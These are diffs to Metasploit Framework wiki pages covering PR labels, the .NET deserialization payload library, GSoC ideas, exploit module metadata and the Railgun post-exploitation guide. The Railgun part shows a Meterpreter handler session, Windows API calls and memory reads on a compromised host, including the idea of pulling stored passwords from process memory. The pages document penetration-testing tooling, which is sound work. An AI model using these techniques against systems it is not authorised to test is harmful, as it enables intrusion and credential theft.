+          $stderr.puts "[!] Error #{File.join(WIKI_PATH, error[:path])}:\n#{error[:messages].map { |message| "\t- #{message}\n" }.join}"
+        end
+
+        raise "Errors found in markdown syntax"
+      end
+
      link_corrector
    end
  end
@@ -1,17 +1,41 @@
 Maintainers can assign labels to both issues and pull requests.

+### Attic
+
+When we move something to the attic it means that what you submitted is a thing that we want but the circumstances were not quite right for landing it. Sometimes this is on us, and sometimes the contribution needs more work. We recognize that contributors work on the PRs they submit at their own pace. Take a look at the comments and review suggestions on your PR, and feel free to re-open it if and when you have time to work on it again. Don't think you'll be able to get it across the finish line? Find a community champion to do it for you.
+
+### Bug
+
+Any PR that fixes a bug or an issue that raises awareness of a bug in the framework.
+
+### Breaking Change
+
+Features that are great, but will cause breaking changes and should be deployed on a large release.
+
+### Code Quality
+
+When a PR improves code quality.
+
+### Confirmed
+
+Specifically for issues that have been confirmed by a committer.
+
 ### Docs

 Documentation changes, such as YARD markup, or README.md, or something along those lines.

-### External
+### External Modules

-Touches something in /external, or the Gemfile, or something like that.
+PRs dealing with modules run as their own process.

 ### Heartbleed

 Has to do with heartbleed. This will go away soon, but there are three outstanding still...

+### Hotness
+
+Something we're really excited about.
+
 ### Library

 Touches something in /lib.
@@ -26,20 +50,20 @@ Plugins and scripts, anything that's not otherwise defined.

 ### Module

-Touches something in /modules
+Touches something in /modules.

-### Specs
+### Needs Linting

-Has specs (an rspec test)
+The module needs additional work to pass our automated linting rules.
+
+### Needs More Information
+
+The issue lacks enough detail to replicate/resolve successfully.

 ### Newbie Friendly

 Something that's pretty easy to test or tackle.

-### attic
-
-When we move something to the attic it means that what you submitted is a thing that we want but the circumstances were not quite right for landing it. Sometimes this is on us, and sometimes the contribution needs more work. We recognize that contributors work on the PRs they submit at their own pace. Take a look at the comments and review suggestions on your PR, and feel free to re-open it if and when you have time to work on it again. Don't think you'll be able to get it across the finish line? Find a community champion to do it for you.
-
 ### Needs unique branch

 Your submitted a PR from your `master` branch.
@@ -49,4 +73,74 @@ Because of how GitHub tracks changes between branches and what got added in a pa
 git checkout -b <BRANCH_NAME>
 git push <your_fork_remote> <BRANCH_NAME>
 ```
-This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
+This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
+
+### Needs-docs
+
+When a module is uploaded without a corresponding documentation file, add this label in indicate docs are required
+
+### Not Stale
+
+Label to stop an issue from being auto closed.
+
+### Osx
+
+Label for any osx related work.
+
+### Payload
+
+Touches something related to a payload.
+
+### RN (Release notes)
+
+There are a series of labels that are added to all PRs when they are landed that define the release notes for the PR.
+They are denoted by the `rn-` prefix and they are important as they are used by automation to track metasploit-framework
+statistics:
+
+#### rn-enhancement
+
+Release notes for an enhancement.
+
+#### rn-fix
+
+Release notes for a fix.
+
+#### rn-modules
+
+Release notes for new or majorly enhanced modules.
+
+#### rn-no-release-notes
+
+The PR is too small or insignificant to warrant release notes.
+
+#### rn-wiki
+
+Release notes for Metasploit Framework wiki.
+
+### Stale
+
+Marks an issue as stale, to be closed if no action is taken.
+
+### Suggestion
+
+Suggestions for new functionality.
+
+### Suggestion-docs
+
+New documentation suggestions.
+
+### Suggestion-feature
+
+New feature suggestions.
+
+### Suggestion-Module
+
+New module suggestions.
+
+### Usability
+
+Usability improvements.
+
+### YARD
+
+YARD Documentation Tasks for API Documentation.
@@ -1,4 +1,4 @@
-This page lists the keys in use by [Metasploit committers][msf-committers] and
+This page lists the keys in use by [[Metasploit committers|committer-rights]] and
 can be used to verify merge commits made to <https://github.com/rapid7/metasploit-framework>.

 # Keybase.io identities
@@ -118,7 +118,6 @@ Enter passphrase: [...]

 Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.

-[msf-committers]:https://docs.metasploit.com/docs/development/maintainers/committer-rights.html
 [pro-sharing]:https://filippo.io/on-keybase-dot-io-and-encrypted-private-key-sharing/
 [con-sharing]:https://www.tbray.org/ongoing/When/201x/2014/03/19/Keybase#p-5
 [tracking]:https://github.com/keybase/keybase-issues/issues/100
@@ -1,7 +1,7 @@
 Metasploit includes a library for leveraging .NET deserialization attacks. Using
 it within a module is very straight forward, the module author just needs to
 know two things: the gadget chain and the formatter. The library uses the same
-names for each of these values as the [YSoSerial.NET][1] project for
+names for each of these values as the [YSoSerial.NET][ysoserial] project for
 compatibility, although the Metasploit library only supports a subset of the
 functionality.

@@ -69,7 +69,7 @@ serialized = ::Msf::Util::DotNetDeserialization.generate(
 The library also has an interface available as a standalone command line tool
 which is suitable for creating payloads for single-use research purposes. This
 tool `dot_net.rb` is available in the `tools/payloads/ysoserial` directory. The
-arguments for this tool are aligned with those of [YSoSerial.NET][1], allowing
+arguments for this tool are aligned with those of [YSoSerial.NET][ysoserial], allowing
 the arguments of basic invocations to be the same. It should be noted however
 that the [supported](#support-matrix) gadgets and formatters are not the same.

@@ -109,13 +109,13 @@ generate functions while the `-f` / `--formatter` arguments maps to the
 ## Making Changes

 Adding new gadget chains and formatters involves creating a new file in the
-respective library directory: [`lib/msf/util/dot_net_deserialization`][2]. The
-"native" gadget chain type is implemented following the [MS-NRBF][3] format and
-the [Bindata][4] records as defined in [`types/`][5] subdirectory. Once the new
+respective library directory: [`lib/msf/util/dot_net_deserialization`][dot-net-deserialization-root]. The
+"native" gadget chain type is implemented following the [MS-NRBF] format and
+the [Bindata][] records as defined in [`types/`][dot-net-deserialization-types] subdirectory. Once the new
 gadget chain or formatter is implemented, it needs to be added to the main
-library file ([`dot_net_deserialization.rb`][6]).
+library file ([`dot_net_deserialization.rb`][dot-net-deserialization-rb]).

-Since serialization chain generate is deterministic, a [unit test][7] should be
+Since serialization chain generate is deterministic, a [unit test][unit-test] should be
 added for any new gadget chain to ensure that the checksum of the
 BinaryFormatter representation is consistent.

@@ -124,15 +124,13 @@ Since the .NET deserialization gadgets run operating system commands, the
 following resources can be helpful for module developers to deliver native
 payloads such as Meterpreter.

-* [How to use command stagers][8]
-* [How to use Powershell in an exploit][9]
+* [[How to use command stagers|./how-to-use-command-stagers.md]]
+* [[How to use Powershell in an exploit|./how-to-use-powershell-in-an-exploit.md]]

-[1]: https://github.com/pwntester/ysoserial.net
-[2]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization
-[3]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5
-[4]: https://github.com/dmendel/bindata
-[5]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
-[6]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
-[7]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
-[8]: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
-[9]: https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html
+[ysoserial]: https://github.com/pwntester/ysoserial.net
+[dot-net-deserialization-root]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization
+[MS-NRBF]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5
+[Bindata]: https://github.com/dmendel/bindata
+[dot-net-deserialization-types]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
+[dot-net-deserialization-rb]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
+[unit-test]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
@@ -1,6 +1,6 @@
 GSoC Project Ideas in no particular order.

-Mentors: @busterb, @zerosteiner, @timwr, @asoto-r7, @jmartin-r7, @pbarry-r7, @mkienow-r7, @jbarnett-r7
+Mentors: [@busterb](https://github.com/busterb), [@zerosteiner](https://github.com/zerosteiner), [@timwr](https://github.com/timwr), [@asoto-r7](https://github.com/asoto-r7), [@jmartin-r7](https://github.com/jmartin-r7), [@pbarry-r7](https://github.com/pbarry-r7), [@mkienow-r7](https://github.com/mkienow-r7), [@jbarnett-r7](https://github.com/jbarnett-r7)

 ## Enhance Metasploit Framework

@@ -1,6 +1,6 @@
 GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.

-Mentors: @zerosteiner, @jmartin-r7
+Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://github.com/jmartin-r7)

 ## Enhance Metasploit Framework

@@ -1,6 +1,6 @@
 GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.

-Mentors: @zerosteiner, @jmartin-r7
+Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://github.com/jmartin-r7)

 ## Enhance Metasploit Framework

@@ -1,6 +1,6 @@
 GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.

-Mentors: @zerosteiner, @jmartin-r7, @gwillcox-r7
+Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://github.com/jmartin-r7), [@gwillcox-r7](https://github.com/gwillcox-r7)

 Slack Contacts: @zeroSteiner, @Op3n4M3, @gwillcox-r7 on [Metasploit Slack](https://metasploit.slack.com/)

@@ -24,7 +24,7 @@ Difficulty: 4/5

 ### LDAP Capture Capabilities

-Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
+Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=msf_docs). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.

 Size: Medium  
 Difficulty: 3/5
@@ -58,7 +58,7 @@ Difficulty: 4/5

 Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed.

-See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [Metasploit-Data-Service-Enhancements-(Goliath)](./Metasploit-Data-Service-Enhancements-Goliath)
+See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [[Metasploit-Data-Service-Enhancements-(Goliath)|./Metasploit-Data-Service-Enhancements-Goliath]

 Size: Medium/Large (Depends on proposal)  
 Difficulty 3/5
@@ -1,8 +1,8 @@
 GSoC Project Ideas in no particular order. When you've picked one, take a look at [[How-to-Apply-to-GSoC]] for how to make a proposal.

-Mentors: @jmartin-r7, @gwillcox-r7
+Mentors: [@jmartin-r7](https://github.com/jmartin-r7) 

-Slack Contacts: @Op3n4M3, @gwillcox-r7 on [Metasploit Slack](https://metasploit.slack.com/)
+Slack Contacts: @Op3n4M3 on [Metasploit Slack](https://metasploit.slack.com/)

 For any questions about these projects reach out on the Metasploit Slack in the `#gsoc` channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don't expect an immediate response, however we will endeavor to respond as soon as possible. If you'd prefer not to join Slack, you can also email `msfdev [@] metasploit [dot] com` and we will respond to your questions there if email is preferable.

@@ -17,7 +17,7 @@ Difficulty: 4/5

 ### LDAP Capture Capabilities

-Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
+Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=msf_docs). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.

 Size: Medium  
 Difficulty: 3/5
@@ -46,7 +46,7 @@ Enhance existing Metasploit Goliath dashboard that allows observation of an acti

 See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [[Metasploit-Data-Service-Enhancements-(Goliath)|./Metasploit-Data-Service-Enhancements-Goliath]]

-Size: Medium/Large (Depends on proposal)  
+Size: Medium/Large (Depends on proposal)
 Difficulty 3/5

 ## Submit your own
@@ -69,7 +69,12 @@ class MetasploitModule < Msf::Exploit::Remote
        },
        'Privileged' => false,
        'DisclosureDate' => '',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        },
      )
    )
  end
@@ -99,7 +104,14 @@ end

 * **Payloads** - The Payloads field specifies how the payload should be encoded and generated. You can specify: `Space`, `SaveRegisters`, `Prepend`, `PrependEncoder`, `BadChars`, `Append`, `AppendEncoder`, `MaxNops`, `MinNops`, `Encoder`, `Nop`, `EncoderType`, `EncoderOptions`, `ExtendedOptions`, `EncoderDontFallThrough`.

-**DisclosureDate** - The DisclosureDate is about when the vulnerability was disclosed in public, in the format of: "M D Y". For example: "Apr 04 2014"
+* **DisclosureDate** - The DisclosureDate is about when the vulnerability was disclosed in public, in the format of: "M D Y". For example: "Apr 04 2014"
+
+* **Notes** - The Notes field is a hash always containing three keys. The value of each key is an array of constants. The list of available constants can be found in the [[Definition of Module Reliability Side Effects and Stability|./Definition-of-Module-Reliability-Side-Effects-and-Stability.md]]. The key should be present even if the array is empty.
+
+    * **Stability** - The Stability field describes how the exploit affects the system it's being run on, ex: `CRASH_SAFE`, `CRASH_OS_DOWN`
+    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
+    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.
+

 Your exploit should also have a `check` method to support the check command, but this is optional in case it's not possible.

@@ -62,6 +62,14 @@ The other one is ```inspect```, which returns a string of a human-readable repre
 session.inspect
 ```

+One commonly used method of the session object is the `platform` method. For example, if you're writing a post module for a windows exploit, in the check method you'll likely want to use `session.platform` to ensure the target session is affected:
+```ruby
+    unless session.platform == 'windows'
+      # Non-Windows systems are definitely not affected.
+      return Exploit::CheckCode::Safe
+    end
+```
+
 You can also look at [other current post modules](https://github.com/rapid7/metasploit-framework/tree/master/modules/post) and see how they use their session object.

 ### The Msf::Post Mixin
@@ -1,8 +1,8 @@
-Railgun is a very powerful post exploitation feature exclusive to Windows Meterpreter. It allows you to have complete control of your target machine's Windows API, or you can use whatever DLL you find and do even more creative stuff with it. For example: say you have a meterpreter session on a Windows target. You have your eyes on a particular application that you believe stores the user's password, but it is encrypted and there are no tools out there for decryption. With Railgun, what you can do is you can either tap into the process and grep for any sensitive information found in memory, or you can look for the program's DLL that's responsible for the decryption, call it, and let it decrypt it for you. If you're a penetration tester, obviously post exploitation is an important skill to have, but if you don't know Railgun, you are missing out a lot.
+Railgun is a very powerful post exploitation feature exclusive to the Windows and Python Meterpreters. It allows you to have complete control of your target machine's Windows API, or you can use whatever DLL you find and do even more creative stuff with it. For example: say you have a Meterpreter session on a Windows target. You have your eyes on a particular application that you believe stores the user's password, but it is encrypted and there are no tools out there for decryption. With Railgun, you can either tap into the process and grep for any sensitive information found in memory, or you can look for the program's DLL that's responsible for the decryption, call it, and let it decrypt it for you. If you're a penetration tester, obviously post exploitation is an important skill to have, but if you don't know Railgun, you are missing out a lot.

-### Defining a DLL and its functions
+## Defining a DLL and its functions

-The Windows API is obviously quite large, so by default Railgun only comes with a handful of pre-defined DLLs and functions that are commonly used for building a Windows program. These built-in DLLs are: kernel32, ntdll, user32, ws2_32, iphlpapi, advapi32, shell32, netapi32, crypt32, wlanapi, wldap32, version. The same list of built-in DLLs can also be retrieved by using the ```known_dll_names``` method.
+The Windows API is obviously quite large, so by default Railgun only comes with a handful of pre-defined DLLs and functions that are commonly used for building a Windows program. These built-in DLLs are: advapi32, crypt32, dbghelp, iphlpapi, kernel32, netapi32, ntdll, psapi, shell32, spoolss, user32, version, winspool, wlanapi, wldap32, and ws2_32. The same list of built-in DLLs can also be retrieved by using the `known_library_names` method.

 All DLL definitions are found in the "[def](https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions/stdapi/railgun/def)" directory, where they are defined as classes. The following template should demonstrate how a DLL is actually defined:

@@ -16,16 +16,16 @@ module Stdapi
 module Railgun
 module Def

-class Def_somedll
+class Def_windows_somedll

-  def self.create_dll(dll_path = 'somedll')
-    dll = DLL.new(dll_path, ApiConstants.manager)
+  def self.create_library(constant_manager, dll_path = 'somedll')
+    dll = Library.new(library_path, constant_manager)

    # 1st argument = Name of the function
    # 2nd argument = Return value's data type
    # 3rd argument = An array of parameters
    dll.add_function('SomeFunction', 'DWORD',[
-      ["DWORD","hwnd","in"]
+      ['DWORD','hwnd','in']
    ])

    return dll
@@ -36,32 +36,34 @@ end
 end; end; end; end; end; end; end
 ```

-In function definitions, Railgun supports these datatypes: VOID, BOOL, DWORD, WORD, BYTE, LPVOID, HANDLE, PDWORD, PWCHAR, PCHAR, PBLOB.
+In function definitions, Railgun supports these data types: BOOL, BYTE, DWORD, LPVOID, PBLOB, PCHAR, PDWORD, PULONG_PTR, PWCHAR, ULONG_PTR, VOID, WORD.

-There are four parameter/buffer directions: in, out, inout, and return. When you pass a value to an "in" parameter, Railgun handles the memory management. For example, ```MessageBoxA``` has a "in" parameter named ```lpText```, and is of type PCHAR. You can simply pass a Ruby string to it, and Railgun handles the rest, it's all pretty straight forward.
+There are four parameter/buffer directions: in, out, inout, and return. When you pass a value to an "in" parameter, Railgun handles the memory management. For example, `MessageBoxA` has an "in" parameter named `lpText`, and is of type PCHAR. You can simply pass a Ruby string to it, and Railgun handles the rest, it's all pretty straight forward.

-An "out" parameter will always be of a pointer datatype. Basically you tell Railgun how many bytes to allocate for the parameter, it allocates memory, provides a pointer to it when calling the function, and then it reads that region of memory that the function wrote, converts that to a Ruby object and adds it to the return hash.
+An "out" parameter will always be of a pointer datatype. Basically you tell Railgun how many bytes to allocate for the parameter, it allocates memory, provides a pointer to it when calling the function, and then it reads that region of memory that the function wrote, converts that to a Ruby object and adds it to the return hash. Some datatypes such as LPVOID and ULONG_PTR have a size that is determined based on the host architecture, e.g. 32-bit versions of Windows use 4-byte/32-bit values. For cross compatibility, the number 4 (for 4-bytes) can be used as the size for these values on both 32-bit and 64-bit systems. The number four comes from the size used for these types in the original 32-bit implementation and was selected to maintain backwards compatibility when 64-bit support was added.

 An "inout" parameter serves as an input to the called function, but can be potentially modified by it. You can inspect the return hash for the modified value like an "out" parameter.

-A quick way to define a new function at runtime can be done like the following example:
+The fourth type, "return" is used as the return data type. It is passed to `#add_function` after the function name argument.
+
+A quick way to define a new function (or redefine an existing function) at runtime can be done like the following example:

 ```ruby
 client.railgun.add_function('user32', 'MessageBoxA', 'DWORD',[
-	["DWORD","hWnd","in"],
-	["PCHAR","lpText","in"],
-	["PCHAR","lpCaption","in"],
-	["DWORD","uType","in"]
+	['DWORD','hWnd','in'],
+	['PCHAR','lpText','in'],
+	['PCHAR','lpCaption','in'],
+	['DWORD','uType','in']
 ])
 ```

-However, if this function will most likely be used more than once, or it's part of the Windows API, then you should put it in the library.
+However, if this function will most likely be used more than once, or it's part of the Windows API, then you should put it in to the library.

-### Usage
+## Usage

 The best way to try Railgun is with irb in a Windows Meterpreter prompt. Here's an example of how to get there:

-```
+```msf
 $ msfconsole -q
 msf > use exploit/multi/handler
 msf exploit(handler) > run
@@ -72,70 +74,81 @@ msf exploit(handler) > run
 [*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.106:55148) at 2014-07-30 19:49:35 -0500

 meterpreter > irb
-[*] Starting IRB shell
-[*] The 'client' variable holds the meterpreter client
+[*] Starting IRB shell...
+[*] You are in the "client" (session) object

 >>
 ```

-Note that when you're running a post module or in irb, you always have a ```client``` or ```session``` object to work with, both point to same thing, which in this case is ```Msf::Sessions::Meterpreter_x86_Win```. This Meterpreter session object gives you API access to the target machine, including the Railgun object ```Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::Railgun```. Here's how you simply access it:
+Note that when you're running a post module or in irb, you always have a `client` or `session` object to work with, both point to same thing, which in this case is `Msf::Sessions::Meterpreter_x86_Win`. This Meterpreter session object gives you API access to the target machine, including the Railgun object `Rex::Post::Meterpreter::Extensions::Stdapi::Railgun::Railgun`. Here's how you simply access it:

 ```ruby
-session.railgun
+railgun
 ```

-If you run the above in irb, you will see that it returns information about all the DLLs, functions, constants, etc, except it's a little unfriendly to read because there's so much data. Fortunately, there are some handy tricks to help us to figure things out. For example, like we mentioned before, if you're not sure what DLLs are loaded, you can call the ```known_dll_names``` method:
+If you run the above in irb, you will see that it returns information about all the DLLs, functions, constants, etc, except it's a little unfriendly to read because there's so much data. Fortunately, there are some handy tricks to help us to figure things out. For example, like we mentioned before, if you're not sure what DLLs are loaded, you can call the `known_dll_name` method:

 ```
->> session.railgun.known_dll_names
-=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"]
+>> railgun.known_library_names
+=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version", "psapi", "dbghelp", "winspool", "spoolss"]
 ```

 Now, say we're interested in user32 and we want to find all the available functions (as well as return value's data type, parameters), another handy trick is this:

 ```ruby
-session.railgun.user32.functions.each_pair {|n, v| puts "Function name: #{n}, Returns: #{v.return_type}, Params: #{v.params}"}
+railgun.user32.functions.each_pair {|n, v| puts "Function name: #{n}, Returns: #{v.return_type}, Params: #{v.params}"}
 ```

-Note that if you happen to call an invalid or unsupported Windows function, a ```RuntimeError``` will raise, and the error message also shows a list of available functions.
+Note that if you happen to call an invalid or unsupported Windows function, a `RuntimeError` will raise, and the error message also shows a list of available functions.

-To call a Windows API function, here's how:
+To call a Windows API function, call the Ruby function of the desired name on the corresponding library (DLL) object. For example to call `user32!MessageBoxA`:

 ```
->> session.railgun.user32.MessageBoxA(0, "hello, world", "hello", "MB_OK")
+>> railgun.user32.MessageBoxA(0, "hello, world", "hello", "MB_OK")
 => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1}
 ```

-As you can see this API call returns a hash. One habit we have seen is that sometimes people don't like to check ```GetLastError```, ```ErrorMessage```, and/or the ```return``` value, they kind of just assume it works. This is a bad programming habit, and is not recommended. If you always assume something works, and execute the next API call, you risk having unexpected results (worst case scenario: losing the Meterpreter session).
+As you can see, this API call returns a hash. The "return" key is the return value of the function, as defined by its defined datatype. If the return type is a pointer to a known type (a pointer other than LPVOID, such as PCHAR), then the "return" key will be the value of that type and an additional "&return" key will be included. The "&return" key, when present, is the address in memory at which the "return" value is located. This is useful when the caller needs to both access the value but also have the ability to free it at a later time. Note that in these cases, if the pointer is NULL, "return" will always be Ruby's `nil` value and "&return" will be 0.

-### Memory Reading and Writing
+The "GetLastError" key is the threads last-error code, as returned by [kernel32!GetLastError][kernel32!GetLastError]. This value is useful for determining if the function call was successful and not not, why it failed. The "ErrorMessage" key is a string to a human readable name of the corresponding "GetLastError" code. When making a function call through railgun, it s important to inspect the results to determine if it was successful before processing any results. There is no error handling for native API calls, so simple mistakes like accessing invalid memory locations will cause the session to close as the host process crashes.

-The ```Railgun``` class also has two very useful methods that you will probably use: ```memread``` and ```memwrite```. The names are pretty self-explanatory: You read a block of memory, or you write to a region of memory. We'll demonstrate this with a new block of memory in the payload itself:
+## Memory Reading and Writing
+
+The `Railgun` class also has useful methods that you will probably use: `memread` and `memwrite`. The names are pretty self-explanatory: You read a block of memory, or you write to a region of memory. We'll demonstrate this with a new block of memory in the payload itself:

 ```
->> p = session.sys.process.open(session.sys.process.getpid, PROCESS_ALL_ACCESS)
+>> process = sys.process.open(sys.process.getpid, PROCESS_ALL_ACCESS)
 => #<#<Class:0x007fe2e051b740>:0x007fe2c5a258a0 @client=#<Session:meterpreter 192.168.1.106:55151 (192.168.1.106) "WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM">, @handle=448, @channel=nil, @pid=2268, @aliases={"image"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Image:0x007fe2c5a25828 @process=#<#<Class:0x007fe2e051b740>:0x007fe2c5a258a0 ...>>, "io"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::IO:0x007fe2c5a257b0 @process=#<#<Class:0x007fe2e051b740>:0x007fe2c5a258a0 ...>>, "memory"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Memory:0x007fe2c5a25738 @process=#<#<Class:0x007fe2e051b740>:0x007fe2c5a258a0 ...>>, "thread"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessSubsystem::Thread:0x007fe2c5a256c0 @process=#<#<Class:0x007fe2e051b740>:0x007fe2c5a258a0 ...>>}>
->> p.memory.allocate(1024)
+>> address = process.memory.allocate(1024)
 => 5898240
 ```

-As you can see, the new allocation is at address 5898240 (or 0x005A0000 in hex). Let's first write four bytes to it:
+As you can see, the new allocation is at the previously allocated address. Let's first write some data to it:

 ```
->> session.railgun.memwrite(5898240, "AAAA", 4)
+>> railgun.memwrite(address, "AAAA\x00".b)
 => true
 ```

-```memwrite``` returns true, which means successful. Now let's read 4 bytes from 0x005A0000:
+`memwrite` returns true, which means successful. Now let's read 4 bytes from the same address:

 ```
->> session.railgun.memread(5898240, 4)
+>> railgun.memread(address, 4)
 => "AAAA"
 ```

 Be aware that if you supply a bad pointer, you can cause an access violation and crash Meterpreter.

-### References:
+### Reading and Writing Strings
+
+Railgun also has a number of useful utility methods in `railgun.util`. For example, the `#read_string` method can be used to read an ASCII string from memory. A `read_wstring` variant can be used to read UTF-16 strings.
+
+```
+>> railgun.util.read_string(address)
+=> "AAAA"
+```
+
+## References:

 - <https://www.youtube.com/watch?v=AniR-T0AnnI>
 - <https://www.defcon.org/images/defcon-20/dc-20-presentations/Maloney/DEFCON-20-Maloney-Railgun.pdf>
@@ -144,3 +157,5 @@ Be aware that if you supply a bad pointer, you can cause an access violation and
 - <http://msdn.microsoft.com/en-us/library/aa383749>
 - <http://undocumented.ntinternals.net/>
 - <http://source.winehq.org/WineAPI/>
+
+[kernel32!GetLastError]: https://learn.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-getlasterror
@@ -20,7 +20,7 @@ This may sound surprising, but sometimes we get asked questions that are already

 * **Which ones have been tested**: When a module is developed, usually the exploit isn't tested against every single setup if there are too many. Usually the developers will just try to test whatever they can get their hands on. So if your target isn't mentioned here, keep in mind there is no guarantee it's going to work 100%. The safest thing to do is to actually recreate the environment your target has, and test the exploit before hitting the real thing.

-* **What conditions the server must meet in order to be exploitable**: Quite often, a vulnerability requires multiple conditions to be exploitable. In some cases you can rely on the exploit's [check command](How-to-write-a-check-method.md), because when Metasploit flags something as vulnerable, it actually exploited the bug. For browser exploits using the BrowserExploitServer mixin, it will also check exploitable requirements before loading the exploit. But automation isn't always there, so you should try to find this information before running that "exploit" command. Sometimes it's just common sense, really. For example: a web application's file upload feature might be abused to upload a web-based backdoor, and stuff like that usually requires the upload folder to be accessible for the user. If your target doesn't meet the requirement(s), there is no point to try.
